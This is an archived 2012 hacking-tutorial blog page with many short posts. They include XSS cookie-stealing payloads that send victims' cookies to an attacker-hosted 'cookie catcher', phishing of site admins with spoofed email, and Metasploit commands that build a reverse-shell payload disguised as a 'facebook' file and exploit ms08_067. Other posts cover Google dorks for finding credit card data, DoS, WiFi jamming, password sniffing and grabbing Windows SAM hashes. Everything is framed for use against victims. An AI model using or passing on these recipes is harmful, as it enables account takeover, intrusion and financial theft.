Sunday, October 28, 2012

How to exploit CSRF vulnerability(CSRF tutorial)?

11 comments
Today, I'm going to explain you about WEB vulnerability that not everyone knows...but it very popular.This vulnerability is very dangerous and effective.Usually, the vulnerability exploiting never leave evidences.This vulnerability called: Cross Site Request Forgery(CSRF).CSRF and the way to exploit it is extremely easy; Much easier then all the complicated injections.

How does it works?

It works by forcing the slave's browser to run HTTP requests in order to implement a range of actions, for example :
  • Permission faking\stealing.
  • Transfer of funds from the Bank
  • Disruption of the normal sequence of the site
And much more.

Online Hacking tools

5 comments
Here are some online hacking tools. If your internet connection is slow then you don`t want to download some security software for just information gathering & exploit searching. So you can use online website for this purpose, although big advantage is your i.p is not directly flashing to victim. If you use proxy then it`s more secure because website don`t have your i.p also.

http://www.novirusthanks.org/(Online File Scanner)
http://www.virustotal.com(Online File Scanner)
http://anubis.iseclab.org/(Online File Scanner)
http://www.ipvoid.com/(IP Address scanner)
http://www.threatlog.com/(HoneyPot Database)
http://www.idoproxy.com(proxy)
http://whois.domaintools.com/(Whois lookup)
http://www.robtex.com/(swiss army knife internet tool)
http://www.netirk.com/(Pinger)
http://www.ahbl.org/lktool(IP Lookup)

http://www.blocklist.de/
http://www.cirt.net/passwords(Default password list)
http://www.cirt.net/ports(Default Ports List)
http://www.urlvoid.com/extract-url/(URL Shortener extractor)
http://www.urlvoid.com/http-headers/(Show the HTTP headers of a link)
http://www.urlvoid.com/find-parasites/(Find Parasites)
http://www.urlvoid.com/url-dump/(URL Dump)
http://www.fail2ban.org/wiki/index.php/Main_Page( For your website)
http://www.nmap.org(port scanner)

Wednesday, October 24, 2012

What you can do after hacking remote pc?

2 comments
What you can do after hacking remote pc?

If you know command line interface very well than you can operate remote pc as local pc.
Here I am listing some basic code of metasploit to operate remote pc from your terminal

But before that you have to exploit remote pc . For this purpose check my previous posts of “How to hack remote pc” here .

(1)How to gather installed application in victim pc.
Here are codes
msf >use post/windows/gather/enum_applications
msf post(enum_applications) >set session 1
msf post(enum_applications) >exploit

(2)How to gather usb drive history of victim pc?
Here are codes
msf >use post/windows/gather/usb_history
msf post(usb_history) >set session 1
msf post(usb_history) >exploit

How to jam WIFI network in UBUNTU & BACK TRACK?

4 comments

If you have UBUNTU or BACK TRACK installed ,then you can start from step 7 directly you can skip first six step. If you have windows user start from here.

Step 1: Download Backtrack 5 R2 here as .iso for 32 bit:http://www.backtrack-linux.org/ajax/down...OME-32.iso
and 64 bit:http://www.backtrack-linux.org/ajax/down...OME-64.iso

Step 2: Download UNetbootin for Windows:http://unetbootin.sourceforge.net/unetbo...latest.exe

Step 3: Insert your FAT32 formatted flash/hard drive and open UNetbootin.

Step 4: At the bottom of UNetbootin you'll see it says Disc Image. Select ISO and find your file.
Type: USB-drive.
Letter: H:\ or whatever your computer says.
Then press on OK and let it finish.

Step 5: When it's done, press on Reboot now and when you're booting, remember to boot on your flash/hard drive. I use F12 when I'm booting to change, but it depends on each computer.

How to download youtube video?

0 comments

There are lots of method for download you tube videos.But here i am listing some commonly use methods

(1)It`s very easy , Download youtube downloader from here.& install it.open software & copy & paste video url into software.BUT here is problem, if your connection lost then it can not be resumed.

(2)Copy video url from youtube, now open http://keepvid.com or http://savevid.com and paste video url into their site. But for this purpose you should have java program installed.

(3)it`s my favourite method. No software or plugin needed. If you want to download following video
http://youtube.com/watch?v=Y4E9brXa6hA then just put ss at begining of url like http://ssyoutube.com/watch?v=Y4E9brXa6hA and copy it & paste it in your browser addressbar.

(4)if you have internet download manager installed.it will automatically download when you start watching video. you can download full crack version of internet download manager form here.

How to change MAC address?

0 comments
Changing Your MAC Address In Window XP/Vista, Linux And Mac OS X
(Sometimes known as MAC spoofing)

First let me explain a few things about MAC addresses. MAC stands for Media Access Control and in a sense the MAC address is a computer's true name on a LAN. An Ethernet MAC address is a six byte number, usually expressed as a twelve digit hexadecimal number (Example: 1AB4C234AB1F).

IPs are translated to MAC address by a protocol called ARP (Address Resolution Protocol). Let's say a computer with and IP of 192.168.1.1 wants to send information to another computer on the LAN that has an IP of 192.168.1.2 . First 192.168.1.1 will send out a broadcast to all stations on the LAN asking who has the IP 192.168.1.2. Then the box that has 192.168.1.2 will respond to 192.168.1.1 with it's MAC address which is cached in 192.168.1.1's ARP table for later use. To put this in Socratic Dialog form (with just a touch of Stallone):

Host 1 (192.168.1.1):Yo everyone on the LAN (FF:FF:FF:FF:FF:FF), who has the IP 192.168.1.2? My MAC is DE:AD:BE:EF:CA:FE so you can respond back to me.
Host 2 (192.168.1.2):Hello DE:AD:BE:EF:CA:FE, I have IP 192.168.1.2 and my MAC address is 12:34:56:78:90:12 so you can send your IP packets to me.

You can see the ARP table of a box by dropping out to a command prompt and typing "arp –a" in Windows or just "arp" in Linux. ARP can also work the other way by a host on the LAN sending its MAC address to another machine on the LAN for preemptive caching unless the host is configured to not accept un-requested ARP replies.

Sunday, October 21, 2012

how to do XSS Attack on website?

10 comments
Hi XSS is in 2 ways, Persistent and Non-Persistent type.

For XSS we will use something called a cookie catcher.
Question will be that why we would need someone else's cookie?
The answer is that we can change our browser's cookies to login as them!!! So lets call it Session Hijacking
First go to a free hosting site like http://www.110mb.com or other php hosting sites and register there. Then download this cookie catcher and upload it.
Cookie Catcher:  http://www.4shared.com/file/oCnEgaDr/cookie_catcher.html

What does the cookie catcher do?

It grabs the user's:

    Cookies

    IP

    Referral link which what page it got to that link

    Time and Date

Get Vulnerable sites:


Ok first we need sites that are vulnerable to XSS so it will work on them.
To test it we will need to add a code after the link.
I will use this site that many of you probably saw it before.
site: click here . Now for testing if a site is vuln or not you can add these codes:

code:

"><script>alert(document.cookie)</script>

code:

'><script>alert(document.cookie)</script>

code:

"><script>alert("test")</script>

code:

'><script>alert("test")</script>

code:

"><body bgcolor="FF000"></body>

code:

"><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe>


Then if we see a java script popup like this:


xss

Or if you used my testing and you saw the page's background go black or a page of google opens in that site means its vulnerable to XSS attacks.
In the end, if your site is http://www.example.com the link to test it would be: http://www.example.com/index.php?id="><script>alert(document.cookie)</script>


Persistent XSS:

In this method we will grab the victim's cookies with no suspection and completely stealth.
Now assume we have a forum which has HTML enabled or a site which has a comment page which is vulnerable to XSS.
Ok now lets go to this site: click here
Now test and see if the XSS vulnerable test's work on it.
It does!!! And your getting one of the vulnerability's symptoms. So now lets try to grab it's cookies. If there is a box to type and submit it add this:

code

<script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>

and submit that post in the forum or the comment box also its good to add something before adding the code like: hey i got a problem logging in???
so they wont suspect you .Refresh the page, now go to the newly created page, in the same directory as you saved your cookie catcher .php search for cookies.html which is a new file that show you the cookies. like if your cookie catcher link would be:
http://www.example.com/cookie catcher.php
the container of the cookies would be:
http://www.example.com/cookies.html
Now visit cookies.html and you would see the session of that cookie!
PS: the site i used doesn't support cookies so you can use: click here for cookie supporting.

Now there is another way for a cookie grabbing drive by, add this code and post it:

Code:

<iframe frameborder=0 height=0 width=0 src=javascript:void(document.location="www.you.110mb.com/cookie catcher.php?c="+document.cookie) </iframe>

Then post it in the forum or the comment box.
Now this will open a iframe in the page which will allow you to have the same page in that website. If you don't know about iframes make a new html file in your computer and just do a

<iframe src="www.google.com"></iframe> and you will understand iframes more

ofc the site Needs to have cookies supported! a blank javascript means you need to go to another site.

Non-Persistent XSS:

Ok in this method we will make the victim admin go to our link. First we will pick a XSS vuln site. For this method we will need a search.php which that page is vuln to XSS and has cookies in that page. In the vuln search.php in the textbox for the word to search for type:

code:

<script>alert(document.cookie)</script>

and click the search button. If you see a javascript popup means its vuln to Non-Persistent XSS attack. Ok now we will do something similar.
I will use this link for this method: click here
Now in front of the search.php?search= add this:

Code:

"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>

Now go to http://www.tinyurl.com and shrink the whole page's link. Try to find a site administrator's E-mail in that vuln website and send a Fake Mail from a online fake mailer like this one:


http://tipstrickshack.blogspot.com/2012/09/how-to-spoof-email-addresses.html


Now in the body just tell something fake like: Hey i found a huge bug in your website! and give him the shrinked link of the search.php which you added the code in front of it to him. so the Tinyurl will mask it and once he goes to the link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookies catcher. No matter what he does and changes his password you can still login as him

Session Hijacking:

Ok now you have the admin's cookies either way, so we need to edit our own browser's cookies. First go to that page's admin login or its main page and delete ALL of your cookies from that page. Now go in your cookies.html page and copy everything in front of the Cookie: in a note opened Notepad. The ; separates cookies from each other so first copy the code before the ; .
Now go in that vuln website and clear the link. instead add this:

Code:

Javascript:void(document.cookie="")

or for an example:

Code:

Javascript:void(document.cookie="__utma=255621336.1130089386.1295743598.1305934653.1305950205.86")

Then visit the link. Do this with all of the cookies and refresh the page. And wham!!! your logged in as administrator :)

Friday, October 19, 2012

Hack IIS vulnerability & exploit it

0 comments
IIS Exploit website Hacking in Windows Seven 7 Step By Step Explained with Images 
step 1-  click to see
(Go to My Computer, Do Right Cilck and Select Add a network Location)
Step 2- click to see
(click on Next)
Step 3- click to see
(click on Next)
step 4- click to see
(now enther The URL of vuln website and Click on Next, For example tka this site  http://www.myxixia.com/)

Thursday, October 18, 2012

How to Find Vulnerable website?

2 comments

first of all this is for newbie who have problems finding vulnerable websites.


- The important thing is : To Be Creative !


Why you need to be creative??


Well if we take an example of this dork "inurl:members.php?id=" a lot of people are using it so probly if you use it you'll just find your self trying to hack a website that is already hacked or the database its fucked even if you think about skiping to the page rank 100+ well you're not the only one who thought about this idea, anyway the meaning of Be creative is to add some keywords to your dorks for example "inurl:members.php?id= shop" this dork can be useful if you're trying to get some credit card numbers.

********************************************

How to do Local File inclusion?

0 comments


Local File inclusion is a common website hacking trick. This tutorial will show you how to exploit a website using L.F.I.
First of all, take a look on the given php code.
<?php
$page=$_GET[page];
include($page);
?>

The above given code is generally used in many website by web developers which should not
be use because the $page isn't sanitized and is passed directly to the webpage. This code is used by hackers for L.F.I.

Monday, October 15, 2012

Hack Linux OS using METASPLOIT

3 comments
The most common use of msfpayload tool is for the generation of shellcode for an exploit that is not currently in the Metasploit Framework or for testing different types of shellcode and options before finalizing a module.

msfpayload linux/x86/meterpreter/reverse_tcp lhost=192.168.1.6 lport=4444 x > /root/Desktop/facebook


ubuntu-exploit


Now we successfully generate the malicious exe File, it will stored on your local computer /root/Desktop/facebook

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

Open your terminal & type following commands.

msfconsole

use exploit/multi/handler

set payload linux/x86/meterpreter/reverse_tcp

set lhost 192.168.1.6

set lport 4444

exploit


Now send your facebook.exe files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

Saturday, October 13, 2012

How to Find Email-Address of the domain using metasploit?

1 comments

First open your terminal & Type following command
msfconsole
use auxiliary/gather/search_email_collector show options
metasploit-email-harvest


The next step you need to set up the domain you want to locate the email address.
When we finished setup the domain, the default searching engine that will be use for this searching are GoogleBing, and Yahoo.
Now next step is type
set domain “name of domain” (without quote) & press enter.
& type run and press enter.
It will search email address of domain in google,yahoo & bing.


Friday, October 12, 2012

How to hide secret file in image?

1 comments


How to hide secret file in image?

Hello friends. Today we learn about other tricks of steganography. In past we learn about how to hide text in notepad. Now we learn about how to hide confidential file in image?

Requirement
Command prompt.

Before begin, I have one secret file named : secret.pdf, I do not want other people know about this file and also a picture named : apple.jpg. All of that files I put on my personal folder named pictures.

  1. open command prompt.
  2. Now change directory to picture folder through command prompt.
  3. Now compress your secret file(secret.pdf) using winrar.
  4. Next we use command prompt. type following code
    copy /b [image_filename].jpg + [rar_filename].rar nkd.jpg
    for our example code becomes
    copy /b apple.jpg + secret.rar nkd.jpg
    here nkd.jpg is our newfile which contain hidden document.
  5. Go your picture folder , you can see nkd.jpg.
  6. Now to view original file ,nothing too do just open file with winrar or you can also change extention from jpg to rar.

Tuesday, October 9, 2012

Some Metasploit Attacks

3 comments


today i will show you Some metasploit attacks.
Requirement:-
Backtrack.
Metasploit.

These are just some commands ,there are lots of options in metasploit. Acoording to vulnarability you can use it.

Attack 1: Hacking Windows XP with Metasploit tutorial - VNC remote control

use windows/smb/ms08_067_netapi
show optios
set RHOST 192.168.1.1 ----->IP target
set payload windows/vncinject/bind_tcp
exploit

Saturday, October 6, 2012

DOS attack from linux using hping3.

1 comments
I am here to explain the DoS attacks (with practicals). You all know about DoS attack, Denial-of-Service Attacks. In this attack, attacker denies the user to use a particular service. You can have many tools for DoS attacks, but I'm gonna teach you a simple method for stress testing on the service.
We need Hping3 (It is available in linux only but you can use hping2 in windows but i can't assure you that it will work for this practical).Download Hping2/3 here .


Ok so let's bring down some services.

How to enable right click in web-site?

1 comments
Why Right Click is Disable?

Right clicking your mouse can be very useful when surfing the web. It allows you to save images on webpages to your hard disk, to view source of a particular webpage, to download background music from a blog (when website code isn't complicated), and much more.
Now days, many websites and blogs doesn't allow you to right click on thier websites. I studied HTML and basic web designing, so I like to look at webpages' HTML codes when I find a new interesting website. And it makes me angry to find out that I can't right click. But as you know, there is always a way to get around something.
Just follow this Step.


Go to your browser`s options & disable java script. And reload your site. Now you can right click in website and blog.

Friday, October 5, 2012

How to Sniff HTTP POST Password via Network Using Wireshark Network Analyzer?

0 comments

    How to Sniff HTTP POST Password via Network Using Wireshark Network Analyzer?

    Nowadays most website around the world more than 50% of them (in my opinion ) they didn't provide a secure access into a personal profile or some page that require authentication process where users input their username and password. As we know that data sent via port 80 (HTTP) was plain and without any encryption.
    This tutorial can be an angel and also devil in the same time, it depends to you who use this tutorial for which purpose…me as a writer of this tutorial just hope that all of you can be an angel and know the bad things can happen from it, because I believe that no one from you want your password sniffed by someone out there so don't do that to others too .
    Requirements :
    1.Wireshark Network Analyzer (wireshark.org)
    2. Network Card (Wi-Fi Card, LAN Card, etc) fyi : for wi-fi it should support promiscious mode .

How to remove watermark from image online?

1 comments
step 1
Open an Internet browser window and navigate to "http://www.pixlr.com/editor/." This is a free
online image editor. You can upload images from your computer, create new images or specify
the URL of the image you wish to edit. Choose either to "Open an Image from your Computer
or "Open Image from URL." Browse to your desired image or type in the URL of the image's location.

step 2
Select the Clone Stamp Tool from the toolbox at the left of the screen. The tool looks like a
small stamp with an arrow in it and is located beside a pencil. You can also press "S" to select the
tool.

step 3
Select an area of the image that is comparable to any portion of the watermark you need to
remove. For instance, if part of the watermark is on a dark green area of the image, choose a
portion of the image that's roughly the same color as source point. The Clone Stamp Tool
needs a comparable source point to replace the watermark with the colors from the source.
Press "Ctrl" and left-click with your mouse when you have a source point.

step 4
Position the center of the Clone Stamp Tool over the area of the watermark you wish to
replace with the source point. Left click once to begin painting over the area. You may need to
repeat the process two or three times to completely remove each portion of the watermark.

step 5
Zoom in on your image using the Zoom Tool that looks like a magnifying glass. This will allow
you to see if you've successfully removed all of the watermark. If you haven't, you can still
use the Clone Stamp Tool while zoomed in to finish the removal process.

Thursday, October 4, 2012

How To Hide Text in Notepad?

0 comments

Steganography is an art of writing hidden messages so that no one can suspect the existence of the message. The meaning of Steganography is Concealed Writing and that is what we are going to do. We are going to learn that how to write hidden text in Microsoft Windows text editor Notepad. We should learn this technique so that we can easily hide our personal information in computer without any password protecting tools which are paid tools yes we have to pay to use those tools to protect our text data from unauthorized users. So below I have described with screen shots that how to hide text data in Notepad.

Monday, October 1, 2012

How to Recover Windows 7 password in ubuntu?

0 comments

(1)First boot from Ubuntu O.S from live cd.

(2)Open Ubuntu Software Center . Search for CHNTPW . Install package. If you donot have internet  connection on password lost pc then download from  here.

(3)now open terminal. & type following command    
 cd /media/"drive name of windows 7 partion"/Windows /System32/config
please use your drive name of partion in which windows 7 is installed without quote.

(4)now type  sudo chntpw SAM . AND press ENTER. NOW press 1. & restart pc.


        

HOW TO run .Exe files with wine ?

1 comments
If you run a .exe file with wine and see The file '/home/[username]/example.exe' is not marked as executable. If this was downloaded or copied form an untrusted source, it may be dangerous to run.For more details, read about the executable bit.or anything like that then: This tutorial is for you!

EDIT: (Actually, this will work on any linux computer but in fluxbox when you right-click on the .exe file and go to the permissions tab there is no mark as executable checkbox [for me] So we have no other choice but to do it via terminal)

The only thing we have to do is mark it as executable. [which will be explained below]

I will take the example of example.exe

It is located in /home/[username]/Downloads

First, I will go to home/[username]/Downloads or whatever the folder is

If you did this (go to the folder) with a file manager then (after you are in the folder where the .exe file is present) right click on an empty space on the folder---> then click open in terminal.

A terminal should pop up.

in the terminal type ls

just to see if your file is there. If it isn't then you are not in the correct folder. NOTE: The file should NOT have any spaces. If it does then go back to the folder where it is and right-click it and click Rename then delete the spaces then continue:

Type

chmod 544 example.exe

(Replace example.exe with your .exe file)


Now go to the .exe file with your file manager. You should see a lock on it. This means that it is executable.

Click on it. It will open! If it doesn't then either the file can't be opened by wine or you need to upgrade your wine version

And that's the end of the tutorial!

How To Recover Windows 7 password?

3 comments

Here is the Tutorial how recover forgotten password of xp,vista, win 7?

(1)First you have to boot from another O.S like ubuntu, back track or any other which come in live cd format.Run O.S from cd.( you can also run O.S from pendrive ,it`s faster than cd)

(2)Copy "sam" & "system" file from this location C:/WINDOWS/SYSTEM 32/CONFIG (this files contain your password in NTML hash form) and save it in your pendrive.

UA-35960349-1